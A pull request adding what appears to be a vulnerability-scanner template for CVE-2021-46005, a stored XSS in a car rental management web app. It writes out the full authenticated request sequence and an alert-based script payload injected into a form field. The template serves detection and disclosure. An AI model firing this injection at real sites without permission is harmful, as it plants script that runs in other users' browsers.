Merge pull request #3633 from cckuailong/master

add CVE-2021-46005 (Sourcecodester Car Rental Management System 1.0 - Stored XSS)

cves/2021/CVE-2021-46005.yaml

@@ -0,0 +1,111 @@
+id: CVE-2021-46005
+
+info:
+  name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
+  author: cckuailong
+  severity: medium
+  description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/49546
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46005
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2021-46005
+    cwe-id: CWE-79
+  tags: cve,cve2021,xss,sourcecodester,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /admin/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Connection: close
+
+        username={{username}}&password={{password}}&login=
+
+      - |
+        POST /admin/post-avehical.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
+
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="vehicletitle"
+
+        Test
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="brandname"
+
+        1
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="vehicalorcview"
+
+        </script><script>alert(document.domain)</script>
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="priceperday"
+
+        500
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="fueltype"
+
+        Petrol
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="modelyear"
+
+        2022
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="seatingcapacity"
+
+        5
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="img1"; filename="test.png"
+        Content-Type: image/png
+
+
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="img2"; filename="test.png"
+        Content-Type: image/png
+
+
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="img3"; filename="test.png"
+        Content-Type: image/png
+
+
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="img4"; filename="test.png"
+        Content-Type: image/png
+
+
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="img5"; filename=""
+        Content-Type: application/octet-stream
+
+
+        ------WebKitFormBoundarypWqYipqU21aYgccv
+        Content-Disposition: form-data; name="submit"
+
+
+        ------WebKitFormBoundarypWqYipqU21aYgccv--
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200